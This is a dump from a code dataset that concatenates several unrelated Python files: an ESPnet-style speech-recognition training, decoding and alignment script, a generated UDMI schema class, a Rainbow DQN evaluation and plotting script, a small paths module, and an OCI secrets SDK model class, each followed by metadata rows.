+ ([] if args.num_encs == 1 else report_keys_loss_ctc),
"epoch",
file_name="cer.png",
)
)
trainer.extend(
snapshot_object(model, "model.loss.best"),
trigger=training.triggers.MinValueTrigger("validation/main/loss"),
)
if mtl_mode not in ["ctc", "transducer", "transformer_transducer"]:
trainer.extend(
snapshot_object(model, "model.acc.best"),
trigger=training.triggers.MaxValueTrigger("validation/main/acc"),
)
if args.save_interval_iters > 0:
trainer.extend(
torch_snapshot(filename="snapshot.iter.{.updater.iteration}"),
trigger=(args.save_interval_iters, "iteration"),
)
else:
trainer.extend(torch_snapshot(), trigger=(1, "epoch"))
if args.opt == "adadelta":
if args.criterion == "acc" and mtl_mode != "ctc":
trainer.extend(
restore_snapshot(
model, args.outdir + "/model.acc.best", load_fn=torch_load
),
trigger=CompareValueTrigger(
"validation/main/acc",
lambda best_value, current_value: best_value > current_value,
),
)
trainer.extend(
adadelta_eps_decay(args.eps_decay),
trigger=CompareValueTrigger(
"validation/main/acc",
lambda best_value, current_value: best_value > current_value,
),
)
elif args.criterion == "loss":
trainer.extend(
restore_snapshot(
model, args.outdir + "/model.loss.best", load_fn=torch_load
),
trigger=CompareValueTrigger(
"validation/main/loss",
lambda best_value, current_value: best_value < current_value,
),
)
trainer.extend(
adadelta_eps_decay(args.eps_decay),
trigger=CompareValueTrigger(
"validation/main/loss",
lambda best_value, current_value: best_value < current_value,
),
)
# to escape from a local minimum.
# Thus, restore_snapshot extension is not used here.
# see details in https://github.com/espnet/espnet/pull/2171
elif args.criterion == "loss_eps_decay_only":
trainer.extend(
adadelta_eps_decay(args.eps_decay),
trigger=CompareValueTrigger(
"validation/main/loss",
lambda best_value, current_value: best_value < current_value,
),
)
# Write a log of evaluation statistics for each epoch
trainer.extend(
extensions.LogReport(trigger=(args.report_interval_iters, "iteration"))
)
report_keys = [
"epoch",
"iteration",
"main/loss",
"main/loss_ctc",
"main/loss_att",
"validation/main/loss",
"validation/main/loss_ctc",
"validation/main/loss_att",
"main/acc",
"validation/main/acc",
"main/cer_ctc",
"validation/main/cer_ctc",
"elapsed_time",
] + ([] if args.num_encs == 1 else report_keys_cer_ctc + report_keys_loss_ctc)
if args.opt == "adadelta":
trainer.extend(
extensions.observe_value(
"eps",
lambda trainer: trainer.updater.get_optimizer("main").param_groups[0][
"eps"
],
),
trigger=(args.report_interval_iters, "iteration"),
)
report_keys.append("eps")
if args.report_cer:
report_keys.append("validation/main/cer")
if args.report_wer:
report_keys.append("validation/main/wer")
trainer.extend(
extensions.PrintReport(report_keys),
trigger=(args.report_interval_iters, "iteration"),
)
trainer.extend(extensions.ProgressBar(update_interval=args.report_interval_iters))
set_early_stop(trainer, args)
if args.tensorboard_dir is not None and args.tensorboard_dir != "":
trainer.extend(
TensorboardLogger(
SummaryWriter(args.tensorboard_dir),
att_reporter=att_reporter,
ctc_reporter=ctc_reporter,
),
trigger=(args.report_interval_iters, "iteration"),
)
# Run the training
trainer.run()
check_early_stop(trainer, args.epochs)
def recog(args):
set_deterministic_pytorch(args)
model, train_args = load_trained_model(args.model)
assert isinstance(model, ASRInterface)
model.recog_args = args
if args.streaming_mode and "transformer" in train_args.model_module:
raise NotImplementedError("streaming mode for transformer is not implemented")
logging.info(
" Total parameter of the model = "
+ str(sum(p.numel() for p in model.parameters()))
)
# read rnnlm
if args.rnnlm:
rnnlm_args = get_model_conf(args.rnnlm, args.rnnlm_conf)
if getattr(rnnlm_args, "model_module", "default") != "default":
raise ValueError(
"use '--api v2' option to decode with non-default language model"
)
rnnlm = lm_pytorch.ClassifierWithState(
lm_pytorch.RNNLM(
len(train_args.char_list),
rnnlm_args.layer,
rnnlm_args.unit,
getattr(rnnlm_args, "embed_unit", None), # for backward compatibility
)
)
torch_load(args.rnnlm, rnnlm)
rnnlm.eval()
else:
rnnlm = None
if args.word_rnnlm:
rnnlm_args = get_model_conf(args.word_rnnlm, args.word_rnnlm_conf)
word_dict = rnnlm_args.char_list_dict
char_dict = {x: i for i, x in enumerate(train_args.char_list)}
word_rnnlm = lm_pytorch.ClassifierWithState(
lm_pytorch.RNNLM(
len(word_dict),
rnnlm_args.layer,
rnnlm_args.unit,
getattr(rnnlm_args, "embed_unit", None), # for backward compatibility
)
)
torch_load(args.word_rnnlm, word_rnnlm)
word_rnnlm.eval()
if rnnlm is not None:
rnnlm = lm_pytorch.ClassifierWithState(
extlm_pytorch.MultiLevelLM(
word_rnnlm.predictor, rnnlm.predictor, word_dict, char_dict
)
)
else:
rnnlm = lm_pytorch.ClassifierWithState(
extlm_pytorch.LookAheadWordLM(
word_rnnlm.predictor, word_dict, char_dict
)
)
# gpu
if args.ngpu == 1:
gpu_id = list(range(args.ngpu))
logging.info("gpu id: " + str(gpu_id))
model.cuda()
if rnnlm:
rnnlm.cuda()
# read json data
with open(args.recog_json, "rb") as f:
js = json.load(f)["utts"]
# !!!修改decoding的utt个数
F_data = {}
count = 0
for k, v in js.items():
# if js[k]['utt2spk'] == 'FC01':
if count < 15:
F_data[k] = v
count += 1
js = F_data
new_js = {}
load_inputs_and_targets = LoadInputsAndTargets(
mode="asr",
load_output=False,
sort_in_input_length=False,
preprocess_conf=train_args.preprocess_conf
if args.preprocess_conf is None
else args.preprocess_conf,
preprocess_args={"train": False},
)
# load transducer beam search
if hasattr(model, "rnnt_mode"):
if hasattr(model, "dec"):
trans_decoder = model.dec
else:
trans_decoder = model.decoder
beam_search_transducer = BeamSearchTransducer(
decoder=trans_decoder,
beam_size=args.beam_size,
lm=rnnlm,
lm_weight=args.lm_weight,
# search_type=args.search_type,
# max_sym_exp=args.max_sym_exp,
# u_max=args.u_max, # 50
# nstep=args.nstep,
# prefix_alpha=args.prefix_alpha,
# score_norm=args.score_norm,
)
if args.batchsize == 0:
with torch.no_grad():
for idx, name in enumerate(js.keys(), 1):
logging.info("(%d/%d) decoding " + name, idx, len(js.keys()))
batch = [(name, js[name])]
feat = load_inputs_and_targets(batch)
feat = (
feat[0][0]
if args.num_encs == 1
else [feat[idx][0] for idx in range(model.num_encs)]
)
if args.streaming_mode == "window" and args.num_encs == 1:
logging.info(
"Using streaming recognizer with window size %d frames",
args.streaming_window,
)
se2e = WindowStreamingE2E(e2e=model, recog_args=args, rnnlm=rnnlm)
for i in range(0, feat.shape[0], args.streaming_window):
logging.info(
"Feeding frames %d - %d", i, i + args.streaming_window
)
se2e.accept_input(feat[i : i + args.streaming_window])
logging.info("Running offline attention decoder")
se2e.decode_with_attention_offline()
logging.info("Offline attention decoder finished")
nbest_hyps = se2e.retrieve_recognition()
elif args.streaming_mode == "segment" and args.num_encs == 1:
logging.info(
"Using streaming recognizer with threshold value %d",
args.streaming_min_blank_dur,
)
nbest_hyps = []
for n in range(args.nbest):
nbest_hyps.append({"yseq": [], "score": 0.0})
se2e = SegmentStreamingE2E(e2e=model, recog_args=args, rnnlm=rnnlm)
r = np.prod(model.subsample)
for i in range(0, feat.shape[0], r):
hyps = se2e.accept_input(feat[i : i + r])
if hyps is not None:
text = "".join(
[
train_args.char_list[int(x)]
for x in hyps[0]["yseq"][1:-1]
if int(x) != -1
]
)
text = text.replace(
"\u2581", " "
).strip() # for SentencePiece
text = text.replace(model.space, " ")
text = text.replace(model.blank, "")
logging.info(text)
for n in range(args.nbest):
nbest_hyps[n]["yseq"].extend(hyps[n]["yseq"])
nbest_hyps[n]["score"] += hyps[n]["score"]
elif hasattr(model, "decoder_mode") and model.decoder_mode == "maskctc":
nbest_hyps = model.recognize_maskctc(
feat, args, train_args.char_list
)
elif hasattr(model, "rnnt_mode"):
nbest_hyps = model.recognize(feat, beam_search_transducer)
else:
nbest_hyps = model.recognize(
feat, args, train_args.char_list, rnnlm
)
new_js[name] = add_results_to_json(
js[name], nbest_hyps, train_args.char_list
)
else:
def grouper(n, iterable, fillvalue=None):
kargs = [iter(iterable)] * n
return zip_longest(*kargs, fillvalue=fillvalue)
# sort data if batchsize > 1
keys = list(js.keys())
if args.batchsize > 1:
feat_lens = [js[key]["input"][0]["shape"][0] for key in keys]
sorted_index = sorted(range(len(feat_lens)), key=lambda i: -feat_lens[i])
keys = [keys[i] for i in sorted_index]
with torch.no_grad():
for names in grouper(args.batchsize, keys, None):
names = [name for name in names if name]
batch = [(name, js[name]) for name in names]
feats = (
load_inputs_and_targets(batch)[0]
if args.num_encs == 1
else load_inputs_and_targets(batch)
)
if args.streaming_mode == "window" and args.num_encs == 1:
raise NotImplementedError
elif args.streaming_mode == "segment" and args.num_encs == 1:
if args.batchsize > 1:
raise NotImplementedError
feat = feats[0]
nbest_hyps = []
for n in range(args.nbest):
nbest_hyps.append({"yseq": [], "score": 0.0})
se2e = SegmentStreamingE2E(e2e=model, recog_args=args, rnnlm=rnnlm)
r = np.prod(model.subsample)
for i in range(0, feat.shape[0], r):
hyps = se2e.accept_input(feat[i : i + r])
if hyps is not None:
text = "".join(
[
train_args.char_list[int(x)]
for x in hyps[0]["yseq"][1:-1]
if int(x) != -1
]
)
text = text.replace(
"\u2581", " "
).strip() # for SentencePiece
text = text.replace(model.space, " ")
text = text.replace(model.blank, "")
logging.info(text)
for n in range(args.nbest):
nbest_hyps[n]["yseq"].extend(hyps[n]["yseq"])
nbest_hyps[n]["score"] += hyps[n]["score"]
nbest_hyps = [nbest_hyps]
else:
nbest_hyps = model.recognize_batch(
feats, args, train_args.char_list, rnnlm=rnnlm
)
for i, nbest_hyp in enumerate(nbest_hyps):
name = names[i]
new_js[name] = add_results_to_json(
js[name], nbest_hyp, train_args.char_list
)
with open(args.result_label, "wb") as f:
f.write(
json.dumps(
{"utts": new_js}, indent=4, ensure_ascii=False, sort_keys=True
).encode("utf_8")
)
def enhance(args):
set_deterministic_pytorch(args)
# read training config
idim, odim, train_args = get_model_conf(args.model, args.model_conf)
# TODO(ruizhili): implement enhance for multi-encoder model
assert args.num_encs == 1, "number of encoder should be 1 ({} is given)".format(
args.num_encs
)
# load trained model parameters
logging.info("reading model parameters from " + args.model)
model_class = dynamic_import(train_args.model_module)
model = model_class(idim, odim, train_args)
assert isinstance(model, ASRInterface)
torch_load(args.model, model)
model.recog_args = args
# gpu
if args.ngpu == 1:
gpu_id = list(range(args.ngpu))
logging.info("gpu id: " + str(gpu_id))
model.cuda()
# read json data
with open(args.recog_json, "rb") as f:
js = json.load(f)["utts"]
load_inputs_and_targets = LoadInputsAndTargets(
mode="asr",
load_output=False,
sort_in_input_length=False,
preprocess_conf=None, # Apply pre_process in outer func
)
if args.batchsize == 0:
args.batchsize = 1
# Creates writers for outputs from the network
if args.enh_wspecifier is not None:
enh_writer = file_writer_helper(args.enh_wspecifier, filetype=args.enh_filetype)
else:
enh_writer = None
# Creates a Transformation instance
preprocess_conf = (
train_args.preprocess_conf
if args.preprocess_conf is None
else args.preprocess_conf
)
if preprocess_conf is not None:
logging.info(f"Use preprocessing: {preprocess_conf}")
transform = Transformation(preprocess_conf)
else:
transform = None
# Creates a IStft instance
istft = None
frame_shift = args.istft_n_shift # Used for plot the spectrogram
if args.apply_istft:
if preprocess_conf is not None:
# Read the conffile and find stft setting
with open(preprocess_conf) as f:
# Json format: e.g.
# {"process": [{"type": "stft",
# "win_length": 400,
# "n_fft": 512, "n_shift": 160,
# "window": "han"},
# {"type": "foo", ...}, ...]}
conf = json.load(f)
assert "process" in conf, conf
# Find stft setting
for p in conf["process"]:
if p["type"] == "stft":
istft = IStft(
win_length=p["win_length"],
n_shift=p["n_shift"],
window=p.get("window", "hann"),
)
logging.info(
"stft is found in {}. "
"Setting istft config from it\n{}".format(
preprocess_conf, istft
)
)
frame_shift = p["n_shift"]
break
if istft is None:
# Set from command line arguments
istft = IStft(
win_length=args.istft_win_length,
n_shift=args.istft_n_shift,
window=args.istft_window,
)
logging.info(
"Setting istft config from the command line args\n{}".format(istft)
)
# sort data
keys = list(js.keys())
feat_lens = [js[key]["input"][0]["shape"][0] for key in keys]
sorted_index = sorted(range(len(feat_lens)), key=lambda i: -feat_lens[i])
keys = [keys[i] for i in sorted_index]
def grouper(n, iterable, fillvalue=None):
kargs = [iter(iterable)] * n
return zip_longest(*kargs, fillvalue=fillvalue)
num_images = 0
if not os.path.exists(args.image_dir):
os.makedirs(args.image_dir)
for names in grouper(args.batchsize, keys, None):
batch = [(name, js[name]) for name in names]
# May be in time region: (Batch, [Time, Channel])
org_feats = load_inputs_and_targets(batch)[0]
if transform is not None:
# May be in time-freq region: : (Batch, [Time, Channel, Freq])
feats = transform(org_feats, train=False)
else:
feats = org_feats
with torch.no_grad():
enhanced, mask, ilens = model.enhance(feats)
for idx, name in enumerate(names):
# Assuming mask, feats : [Batch, Time, Channel. Freq]
# enhanced : [Batch, Time, Freq]
enh = enhanced[idx][: ilens[idx]]
mas = mask[idx][: ilens[idx]]
feat = feats[idx]
# Plot spectrogram
if args.image_dir is not None and num_images < args.num_images:
import matplotlib.pyplot as plt
num_images += 1
ref_ch = 0
plt.figure(figsize=(20, 10))
plt.subplot(4, 1, 1)
plt.title("Mask [ref={}ch]".format(ref_ch))
plot_spectrogram(
plt,
mas[:, ref_ch].T,
fs=args.fs,
mode="linear",
frame_shift=frame_shift,
bottom=False,
labelbottom=False,
)
plt.subplot(4, 1, 2)
plt.title("Noisy speech [ref={}ch]".format(ref_ch))
plot_spectrogram(
plt,
feat[:, ref_ch].T,
fs=args.fs,
mode="db",
frame_shift=frame_shift,
bottom=False,
labelbottom=False,
)
plt.subplot(4, 1, 3)
plt.title("Masked speech [ref={}ch]".format(ref_ch))
plot_spectrogram(
plt,
(feat[:, ref_ch] * mas[:, ref_ch]).T,
frame_shift=frame_shift,
fs=args.fs,
mode="db",
bottom=False,
labelbottom=False,
)
plt.subplot(4, 1, 4)
plt.title("Enhanced speech")
plot_spectrogram(
plt, enh.T, fs=args.fs, mode="db", frame_shift=frame_shift
)
plt.savefig(os.path.join(args.image_dir, name + ".png"))
plt.clf()
# Write enhanced wave files
if enh_writer is not None:
if istft is not None:
enh = istft(enh)
else:
enh = enh
if args.keep_length:
if len(org_feats[idx]) < len(enh):
# Truncate the frames added by stft padding
enh = enh[: len(org_feats[idx])]
elif len(org_feats) > len(enh):
padwidth = [(0, (len(org_feats[idx]) - len(enh)))] + [
(0, 0)
] * (enh.ndim - 1)
enh = np.pad(enh, padwidth, mode="constant")
if args.enh_filetype in ("sound", "sound.hdf5"):
enh_writer[name] = (args.fs, enh)
else:
# Hint: To dump stft_signal, mask or etc,
# enh_filetype='hdf5' might be convenient.
enh_writer[name] = enh
if num_images >= args.num_images and enh_writer is None:
logging.info("Breaking the process.")
break
def ctc_align(args):
def add_alignment_to_json(js, alignment, char_list):
# copy old json info
new_js = dict()
new_js["ctc_alignment"] = []
alignment_tokens = []
for idx, a in enumerate(alignment):
alignment_tokens.append(char_list[a])
alignment_tokens = " ".join(alignment_tokens)
new_js["ctc_alignment"] = alignment_tokens
return new_js
set_deterministic_pytorch(args)
model, train_args = load_trained_model(args.model)
assert isinstance(model, ASRInterface)
model.eval()
load_inputs_and_targets = LoadInputsAndTargets(
mode="asr",
load_output=True,
sort_in_input_length=False,
preprocess_conf=train_args.preprocess_conf
if args.preprocess_conf is None
else args.preprocess_conf,
preprocess_args={"train": False},
)
if args.ngpu > 1:
raise NotImplementedError("only single GPU decoding is supported")
if args.ngpu == 1:
device = "cuda"
else:
device = "cpu"
dtype = getattr(torch, args.dtype)
logging.info(f"Decoding device={device}, dtype={dtype}")
model.to(device=device, dtype=dtype).eval()
# read json data
with open(args.align_json, "rb") as f:
js = json.load(f)["utts"]
new_js = {}
if args.batchsize == 0:
with torch.no_grad():
for idx, name in enumerate(js.keys(), 1):
logging.info("(%d/%d) aligning " + name, idx, len(js.keys()))
batch = [(name, js[name])]
feat, label = load_inputs_and_targets(batch)
feat = feat[0]
label = label[0]
enc = model.encode(torch.as_tensor(feat).to(device)).unsqueeze(0)
alignment = model.ctc.forced_align(enc, label)
new_js[name] = add_alignment_to_json(
js[name], alignment, train_args.char_list
)
else:
raise NotImplementedError("Align_batch is not implemented.")
with open(args.result_label, "wb") as f:
f.write(
json.dumps(
{"utts": new_js}, indent=4, ensure_ascii=False, sort_keys=True
).encode("utf_8")
)
| true
| true
|
1c3eb4f292655133a8344fddffc7c4dc2b1eda07
| 1,773
|
py
|
Python
|
gencode/python/udmi/schema/model_pointset_point.py
|
johnrandolph/udmi
|
5e9de32fc71de8d006cda2eba4d3372eaf24c7c0
|
[
"Apache-2.0"
] | 1
|
2022-02-24T22:57:37.000Z
|
2022-02-24T22:57:37.000Z
|
gencode/python/udmi/schema/model_pointset_point.py
|
johnrandolph/udmi
|
5e9de32fc71de8d006cda2eba4d3372eaf24c7c0
|
[
"Apache-2.0"
] | 5
|
2022-02-24T21:32:24.000Z
|
2022-03-23T15:52:25.000Z
|
gencode/python/udmi/schema/model_pointset_point.py
|
johnrandolph/udmi
|
5e9de32fc71de8d006cda2eba4d3372eaf24c7c0
|
[
"Apache-2.0"
] | null | null | null |
"""Generated class for model_pointset_point.json"""
class PointPointsetModel:
"""Generated schema class"""
def __init__(self):
self.units = None
self.writable = None
self.baseline_value = None
self.baseline_tolerance = None
self.baseline_state = None
self.cov_increment = None
self.ref = None
@staticmethod
def from_dict(source):
if not source:
return None
result = PointPointsetModel()
result.units = source.get('units')
result.writable = source.get('writable')
result.baseline_value = source.get('baseline_value')
result.baseline_tolerance = source.get('baseline_tolerance')
result.baseline_state = source.get('baseline_state')
result.cov_increment = source.get('cov_increment')
result.ref = source.get('ref')
return result
@staticmethod
def map_from(source):
if not source:
return None
result = {}
for key in source:
result[key] = PointPointsetModel.from_dict(source[key])
return result
@staticmethod
def expand_dict(input):
result = {}
for property in input:
result[property] = input[property].to_dict() if input[property] else {}
return result
def to_dict(self):
result = {}
if self.units:
result['units'] = self.units # 5
if self.writable:
result['writable'] = self.writable # 5
if self.baseline_value:
result['baseline_value'] = self.baseline_value # 5
if self.baseline_tolerance:
result['baseline_tolerance'] = self.baseline_tolerance # 5
if self.baseline_state:
result['baseline_state'] = self.baseline_state # 5
if self.cov_increment:
result['cov_increment'] = self.cov_increment # 5
if self.ref:
result['ref'] = self.ref # 5
return result
| 28.142857
| 77
| 0.673999
|
class PointPointsetModel:
def __init__(self):
self.units = None
self.writable = None
self.baseline_value = None
self.baseline_tolerance = None
self.baseline_state = None
self.cov_increment = None
self.ref = None
@staticmethod
def from_dict(source):
if not source:
return None
result = PointPointsetModel()
result.units = source.get('units')
result.writable = source.get('writable')
result.baseline_value = source.get('baseline_value')
result.baseline_tolerance = source.get('baseline_tolerance')
result.baseline_state = source.get('baseline_state')
result.cov_increment = source.get('cov_increment')
result.ref = source.get('ref')
return result
@staticmethod
def map_from(source):
if not source:
return None
result = {}
for key in source:
result[key] = PointPointsetModel.from_dict(source[key])
return result
@staticmethod
def expand_dict(input):
result = {}
for property in input:
result[property] = input[property].to_dict() if input[property] else {}
return result
def to_dict(self):
result = {}
if self.units:
result['units'] = self.units
if self.writable:
result['writable'] = self.writable
if self.baseline_value:
result['baseline_value'] = self.baseline_value
if self.baseline_tolerance:
result['baseline_tolerance'] = self.baseline_tolerance
if self.baseline_state:
result['baseline_state'] = self.baseline_state
if self.cov_increment:
result['cov_increment'] = self.cov_increment
if self.ref:
result['ref'] = self.ref
return result
| true
| true
|
1c3eb6073760458c9c196286f9f2a366494125d3
| 3,700
|
py
|
Python
|
test.py
|
chris0711/curl_rainbow
|
2badc1302ef55b8512e6c5a0616045a1a0fd4273
|
[
"MIT"
] | 38
|
2020-07-07T11:29:18.000Z
|
2022-03-28T13:38:04.000Z
|
test.py
|
chris0711/curl_rainbow
|
2badc1302ef55b8512e6c5a0616045a1a0fd4273
|
[
"MIT"
] | 6
|
2020-08-01T11:44:39.000Z
|
2021-06-24T00:15:23.000Z
|
test.py
|
chris0711/curl_rainbow
|
2badc1302ef55b8512e6c5a0616045a1a0fd4273
|
[
"MIT"
] | 18
|
2020-08-07T04:42:37.000Z
|
2021-12-08T22:42:14.000Z
|
# -*- coding: utf-8 -*-
# MIT License
#
# Copyright (c) 2017 Kai Arulkumaran
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
# ==============================================================================
from __future__ import division
import os
import plotly
from plotly.graph_objs import Scatter
from plotly.graph_objs.scatter import Line
import torch
from env import Env
# Test DQN
def test(args, T, dqn, val_mem, metrics, results_dir, evaluate=False):
env = Env(args)
env.eval()
metrics['steps'].append(T)
T_rewards, T_Qs = [], []
# Test performance over several episodes
done = True
for _ in range(args.evaluation_episodes):
while True:
if done:
state, reward_sum, done = env.reset(), 0, False
action = dqn.act_e_greedy(state) # Choose an action ε-greedily
state, reward, done = env.step(action) # Step
reward_sum += reward
if args.render:
env.render()
if done:
T_rewards.append(reward_sum)
break
env.close()
# Test Q-values over validation memory
for state in val_mem: # Iterate over valid states
T_Qs.append(dqn.evaluate_q(state))
avg_reward, avg_Q = sum(T_rewards) / len(T_rewards), sum(T_Qs) / len(T_Qs)
if not evaluate:
# Save model parameters if improved
if avg_reward > metrics['best_avg_reward']:
metrics['best_avg_reward'] = avg_reward
dqn.save(results_dir)
# Append to results and save metrics
metrics['rewards'].append(T_rewards)
metrics['Qs'].append(T_Qs)
torch.save(metrics, os.path.join(results_dir, 'metrics.pth'))
# Plot
_plot_line(metrics['steps'], metrics['rewards'], 'Reward', path=results_dir)
_plot_line(metrics['steps'], metrics['Qs'], 'Q', path=results_dir)
# Return average reward and Q-value
return avg_reward, avg_Q
# Plots min, max and mean + standard deviation bars of a population over time
def _plot_line(xs, ys_population, title, path=''):
max_colour, mean_colour, std_colour, transparent = 'rgb(0, 132, 180)', 'rgb(0, 172, 237)', 'rgba(29, 202, 255, 0.2)', 'rgba(0, 0, 0, 0)'
ys = torch.tensor(ys_population, dtype=torch.float32)
ys_min, ys_max, ys_mean, ys_std = ys.min(1)[0].squeeze(), ys.max(1)[0].squeeze(), ys.mean(1).squeeze(), ys.std(1).squeeze()
ys_upper, ys_lower = ys_mean + ys_std, ys_mean - ys_std
trace_max = Scatter(x=xs, y=ys_max.numpy(), line=Line(color=max_colour, dash='dash'), name='Max')
trace_upper = Scatter(x=xs, y=ys_upper.numpy(), line=Line(color=transparent), name='+1 Std. Dev.', showlegend=False)
trace_mean = Scatter(x=xs, y=ys_mean.numpy(), fill='tonexty', fillcolor=std_colour, line=Line(color=mean_colour), name='Mean')
trace_lower = Scatter(x=xs, y=ys_lower.numpy(), fill='tonexty', fillcolor=std_colour, line=Line(color=transparent), name='-1 Std. Dev.', showlegend=False)
trace_min = Scatter(x=xs, y=ys_min.numpy(), line=Line(color=max_colour, dash='dash'), name='Min')
plotly.offline.plot({
'data': [trace_upper, trace_mean, trace_lower, trace_min, trace_max],
'layout': dict(title=title, xaxis={'title': 'Step'}, yaxis={'title': title})
}, filename=os.path.join(path, title + '.html'), auto_open=False)
| 42.528736
| 434
| 0.687568
|
from __future__ import division
import os
import plotly
from plotly.graph_objs import Scatter
from plotly.graph_objs.scatter import Line
import torch
from env import Env
def test(args, T, dqn, val_mem, metrics, results_dir, evaluate=False):
env = Env(args)
env.eval()
metrics['steps'].append(T)
T_rewards, T_Qs = [], []
done = True
for _ in range(args.evaluation_episodes):
while True:
if done:
state, reward_sum, done = env.reset(), 0, False
action = dqn.act_e_greedy(state)
state, reward, done = env.step(action)
reward_sum += reward
if args.render:
env.render()
if done:
T_rewards.append(reward_sum)
break
env.close()
for state in val_mem:
T_Qs.append(dqn.evaluate_q(state))
avg_reward, avg_Q = sum(T_rewards) / len(T_rewards), sum(T_Qs) / len(T_Qs)
if not evaluate:
if avg_reward > metrics['best_avg_reward']:
metrics['best_avg_reward'] = avg_reward
dqn.save(results_dir)
metrics['rewards'].append(T_rewards)
metrics['Qs'].append(T_Qs)
torch.save(metrics, os.path.join(results_dir, 'metrics.pth'))
_plot_line(metrics['steps'], metrics['rewards'], 'Reward', path=results_dir)
_plot_line(metrics['steps'], metrics['Qs'], 'Q', path=results_dir)
return avg_reward, avg_Q
def _plot_line(xs, ys_population, title, path=''):
max_colour, mean_colour, std_colour, transparent = 'rgb(0, 132, 180)', 'rgb(0, 172, 237)', 'rgba(29, 202, 255, 0.2)', 'rgba(0, 0, 0, 0)'
ys = torch.tensor(ys_population, dtype=torch.float32)
ys_min, ys_max, ys_mean, ys_std = ys.min(1)[0].squeeze(), ys.max(1)[0].squeeze(), ys.mean(1).squeeze(), ys.std(1).squeeze()
ys_upper, ys_lower = ys_mean + ys_std, ys_mean - ys_std
trace_max = Scatter(x=xs, y=ys_max.numpy(), line=Line(color=max_colour, dash='dash'), name='Max')
trace_upper = Scatter(x=xs, y=ys_upper.numpy(), line=Line(color=transparent), name='+1 Std. Dev.', showlegend=False)
trace_mean = Scatter(x=xs, y=ys_mean.numpy(), fill='tonexty', fillcolor=std_colour, line=Line(color=mean_colour), name='Mean')
trace_lower = Scatter(x=xs, y=ys_lower.numpy(), fill='tonexty', fillcolor=std_colour, line=Line(color=transparent), name='-1 Std. Dev.', showlegend=False)
trace_min = Scatter(x=xs, y=ys_min.numpy(), line=Line(color=max_colour, dash='dash'), name='Min')
plotly.offline.plot({
'data': [trace_upper, trace_mean, trace_lower, trace_min, trace_max],
'layout': dict(title=title, xaxis={'title': 'Step'}, yaxis={'title': title})
}, filename=os.path.join(path, title + '.html'), auto_open=False)
| true
| true
|
1c3eb626753b3d4b15e3faae5bef575eb9c8fca1
| 1,352
|
py
|
Python
|
veles/paths.py
|
AkshayJainG/veles
|
21106f41a8e7e7e74453cd16a5059a0e6b1c315e
|
[
"Apache-2.0"
] | 1,007
|
2015-07-20T12:01:41.000Z
|
2022-03-30T23:08:35.000Z
|
veles/paths.py
|
AkshayJainG/veles
|
21106f41a8e7e7e74453cd16a5059a0e6b1c315e
|
[
"Apache-2.0"
] | 52
|
2015-07-21T10:26:24.000Z
|
2019-01-24T05:46:43.000Z
|
veles/paths.py
|
AkshayJainG/veles
|
21106f41a8e7e7e74453cd16a5059a0e6b1c315e
|
[
"Apache-2.0"
] | 235
|
2015-07-20T09:42:42.000Z
|
2021-12-06T18:12:26.000Z
|
# -*- coding: utf-8 -*-
"""
.. invisible:
_ _ _____ _ _____ _____
| | | | ___| | | ___/ ___|
| | | | |__ | | | |__ \ `--.
| | | | __|| | | __| `--. \
\ \_/ / |___| |___| |___/\__/ /
\___/\____/\_____|____/\____/
Created on Nov 5, 2014
███████████████████████████████████████████████████████████████████████████████
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
███████████████████████████████████████████████████████████████████████████████
"""
import os
__root__ = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
__home__ = os.path.join(os.environ.get("HOME", "./"), ".veles")
| 33.8
| 79
| 0.598373
|
import os
__root__ = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
__home__ = os.path.join(os.environ.get("HOME", "./"), ".veles")
| true
| true
|
1c3eb762b26ba98f8d24bccb5374ee0b4f2d6251
| 2,755
|
py
|
Python
|
src/oci/secrets/models/base64_secret_bundle_content_details.py
|
LaudateCorpus1/oci-python-sdk
|
b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
src/oci/secrets/models/base64_secret_bundle_content_details.py
|
LaudateCorpus1/oci-python-sdk
|
b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
src/oci/secrets/models/base64_secret_bundle_content_details.py
|
LaudateCorpus1/oci-python-sdk
|
b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
# coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from .secret_bundle_content_details import SecretBundleContentDetails
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class Base64SecretBundleContentDetails(SecretBundleContentDetails):
"""
The contents of the secret.
"""
def __init__(self, **kwargs):
"""
Initializes a new Base64SecretBundleContentDetails object with values from keyword arguments. The default value of the :py:attr:`~oci.secrets.models.Base64SecretBundleContentDetails.content_type` attribute
of this class is ``BASE64`` and it should not be changed.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param content_type:
The value to assign to the content_type property of this Base64SecretBundleContentDetails.
Allowed values for this property are: "BASE64"
:type content_type: str
:param content:
The value to assign to the content property of this Base64SecretBundleContentDetails.
:type content: str
"""
self.swagger_types = {
'content_type': 'str',
'content': 'str'
}
self.attribute_map = {
'content_type': 'contentType',
'content': 'content'
}
self._content_type = None
self._content = None
self._content_type = 'BASE64'
@property
def content(self):
"""
Gets the content of this Base64SecretBundleContentDetails.
The base64-encoded content of the secret.
:return: The content of this Base64SecretBundleContentDetails.
:rtype: str
"""
